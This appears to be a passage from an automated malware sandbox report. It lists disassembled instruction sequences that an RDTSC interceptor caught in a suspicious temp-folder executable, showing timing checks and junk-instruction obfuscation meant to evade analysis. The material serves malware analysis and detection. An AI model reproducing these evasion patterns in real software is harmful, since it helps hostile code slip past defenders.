Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A400E7 second address: 4A400EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A400EB second address: 4A4013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F3460CF07FAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F3460CF0800h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F3460CF0800h 0x0000001d push dword ptr [ebp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F3460CF0807h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A4013F second address: 4A40145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40145 second address: 4A40170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007F3460CF0807h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A40170 second address: 4A4018B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB977h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A401AD second address: 4A401B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A401B2 second address: 4A401B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60ACE second address: 4A60AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF07FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3460CF0807h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60AF6 second address: 4A60AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60AFC second address: 4A60B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60B00 second address: 4A60B71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3460BFB979h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F3460BFB973h 0x0000001b sbb ch, FFFFFFCEh 0x0000001e jmp 00007F3460BFB979h 0x00000023 popfd 0x00000024 jmp 00007F3460BFB970h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60612 second address: 4A60618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60618 second address: 4A6061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A6061C second address: 4A6065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0803h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F3460CF0806h 0x00000011 push eax 0x00000012 jmp 00007F3460CF07FBh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A6065F second address: 4A60663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60663 second address: 4A60669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60669 second address: 4A6066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A6066F second address: 4A60673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60673 second address: 4A60696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3460BFB977h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60696 second address: 4A6069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60526 second address: 4A6052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A6052B second address: 4A60575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3460CF07FDh 0x0000000a adc si, 1D16h 0x0000000f jmp 00007F3460CF0801h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3460CF0808h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60575 second address: 4A60584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A700B5 second address: 4A700CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460CF0804h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A700CD second address: 4A700EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3460BFB973h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A700EB second address: 4A7014E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F3460CF07FAh 0x00000015 or ch, 00000038h 0x00000018 jmp 00007F3460CF07FBh 0x0000001d popfd 0x0000001e jmp 00007F3460CF0808h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F3460CF0800h 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F3460CF07FAh 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A7014E second address: 4A70154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A70154 second address: 4A7015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A7015A second address: 4A7015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0D3E second address: 4AA0D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0D42 second address: 4AA0D48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0D48 second address: 4AA0D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3460CF0802h 0x00000009 and cl, 00000008h 0x0000000c jmp 00007F3460CF07FBh 0x00000011 popfd 0x00000012 mov ch, 95h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 pushad 0x00000019 mov bx, si 0x0000001c mov ebx, ecx 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3460CF07FBh 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0D8A second address: 4AA0D9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, E898h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0D9D second address: 4AA0DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A6040A second address: 4A6040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A6040E second address: 4A60429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60429 second address: 4A60475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3460BFB972h 0x00000009 add ah, 00000068h 0x0000000c jmp 00007F3460BFB96Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F3460BFB976h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, 7CFCB9E3h 0x00000024 movzx ecx, bx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A70EBB second address: 4A70EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A70EC3 second address: 4A70F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 4Dh 0x00000005 mov ecx, 19652029h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f jmp 00007F3460BFB972h 0x00000014 mov di, ax 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F3460BFB977h 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ebx, 49A11E96h 0x00000027 call 00007F3460BFB977h 0x0000002c pop esi 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A70F22 second address: 4A70FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 pushfd 0x00000007 jmp 00007F3460CF0800h 0x0000000c xor ax, E5E8h 0x00000011 jmp 00007F3460CF07FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F3460CF0804h 0x00000023 sub ecx, 1EBF7848h 0x00000029 jmp 00007F3460CF07FBh 0x0000002e popfd 0x0000002f call 00007F3460CF0808h 0x00000034 pushad 0x00000035 popad 0x00000036 pop eax 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F3460CF07FAh 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A70FA0 second address: 4A70FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A70FA6 second address: 4A70FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A70FAA second address: 4A70FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8020C second address: 4A80210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A80210 second address: 4A80216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A80216 second address: 4A8023B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3460CF0802h 0x00000008 pop esi 0x00000009 mov ebx, 7AC6E756h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8023B second address: 4A8023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8023F second address: 4A80255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0802h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA056B second address: 4AA05DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3460BFB976h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, edi 0x00000013 push edx 0x00000014 mov si, FA1Fh 0x00000018 pop esi 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F3460BFB96Bh 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F3460BFB96Bh 0x0000002b sbb esi, 557AFF1Eh 0x00000031 jmp 00007F3460BFB979h 0x00000036 popfd 0x00000037 movzx esi, dx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA05DD second address: 4AA05E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA05E3 second address: 4AA05E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA05E7 second address: 4AA0669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F3460CF0800h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F3460CF0801h 0x00000019 add eax, 45CCE966h 0x0000001f jmp 00007F3460CF0801h 0x00000024 popfd 0x00000025 pushad 0x00000026 jmp 00007F3460CF07FEh 0x0000002b mov si, D0A1h 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F3460CF0803h 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0669 second address: 4AA06E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [778165FCh] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F3460BFB96Ch 0x00000015 sub ah, FFFFFFC8h 0x00000018 jmp 00007F3460BFB96Bh 0x0000001d popfd 0x0000001e mov bl, al 0x00000020 popad 0x00000021 test eax, eax 0x00000023 pushad 0x00000024 mov edi, 457054A4h 0x00000029 mov bx, 1710h 0x0000002d popad 0x0000002e je 00007F34D38EEC14h 0x00000034 jmp 00007F3460BFB96Fh 0x00000039 mov ecx, eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F3460BFB975h 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA06E6 second address: 4AA0745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3460CF0807h 0x00000009 sub ah, FFFFFFCEh 0x0000000c jmp 00007F3460CF0809h 0x00000011 popfd 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xor eax, dword ptr [ebp+08h] 0x0000001b jmp 00007F3460CF0803h 0x00000020 and ecx, 1Fh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edx 0x00000027 pop ecx 0x00000028 push edx 0x00000029 pop ecx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0745 second address: 4AA0771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB978h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3460BFB96Ah 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0771 second address: 4AA0777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0777 second address: 4AA07A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3460BFB977h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA07A3 second address: 4AA07E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00E72014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F3464960FD4h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 call 00007F3460CF07FAh 0x0000002b movzx esi, di 0x0000002e pop edx 0x0000002f pushfd 0x00000030 jmp 00007F3460CF07FCh 0x00000035 jmp 00007F3460CF0805h 0x0000003a popfd 0x0000003b popad 0x0000003c pop eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA07E9 second address: 4AA07ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA07ED second address: 4AA0827 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3460CF0808h 0x00000008 and ch, FFFFFF88h 0x0000000b jmp 00007F3460CF07FBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov di, si 0x00000016 popad 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007F346496103Dh 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ax, BACDh 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0827 second address: 4AA087D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov ax, 96E7h 0x00000010 mov esi, 3CBDBA83h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F3460BFB96Dh 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F3460BFB96Ch 0x0000002b xor si, BD78h 0x00000030 jmp 00007F3460BFB96Bh 0x00000035 popfd 0x00000036 mov di, si 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA087D second address: 4AA0881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0881 second address: 4AA0887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50011 second address: 4A50017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50017 second address: 4A5002D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3460BFB96Bh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A5002D second address: 4A5007A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 69h 0x00000011 pushfd 0x00000012 jmp 00007F3460CF0804h 0x00000017 sub eax, 504D93E8h 0x0000001d jmp 00007F3460CF07FBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A5007A second address: 4A50092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460BFB974h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50092 second address: 4A50121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF07FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e movzx esi, dx 0x00000011 mov bx, 6D24h 0x00000015 popad 0x00000016 and esp, FFFFFFF8h 0x00000019 jmp 00007F3460CF0803h 0x0000001e xchg eax, ecx 0x0000001f jmp 00007F3460CF0806h 0x00000024 push eax 0x00000025 jmp 00007F3460CF07FBh 0x0000002a xchg eax, ecx 0x0000002b jmp 00007F3460CF0806h 0x00000030 xchg eax, ebx 0x00000031 jmp 00007F3460CF0800h 0x00000036 push eax 0x00000037 jmp 00007F3460CF07FBh 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A50121 second address: 4A50138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F3460BFB971h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
